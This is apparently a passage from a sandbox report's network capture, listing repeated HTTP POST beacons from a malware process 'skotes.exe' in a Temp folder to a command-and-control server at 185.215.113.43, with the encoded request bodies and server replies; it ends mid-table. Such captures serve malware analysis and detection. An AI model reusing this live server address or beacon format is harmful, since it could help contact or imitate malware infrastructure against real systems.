Dec 10, 2024 00:48:12.826658010 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:14.181258917 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50294	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:15.921963930 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:17.249982119 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50295	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:18.898060083 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:20.259500980 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50296	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:22.015840054 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:23.344464064 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50297	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:24.972521067 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:26.312968969 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50298	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:28.067751884 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:29.415044069 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50299	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:31.061894894 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:32.413588047 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50300	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:34.158847094 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:35.509156942 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50301	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:37.143553972 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:38.712301970 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50302	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:40.455435038 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:41.784653902 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50303	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:43.410620928 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:44.745542049 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50305	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:48.021730900 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:49.355626106 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50306	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:51.098287106 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:52.446526051 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50307	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:54.089721918 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:55.443851948 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50308	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:57.187280893 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:58.535924911 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50309	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:00.165150881 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:49:01.520544052 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50310	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:03.260416985 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:49:04.591070890 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	50311	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:06.216595888 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:49:07.568445921 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	50312	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:09.312925100 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:49:10.642592907 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	50313	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:12.289505005 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:49:13.642277002 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	50314	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:15.384021044 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:49:16.732870102 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	50315	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:18.359693050 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:49:19.711847067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	50316	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:49:21.456653118 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:49:22.782521963 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:49:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	50317	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
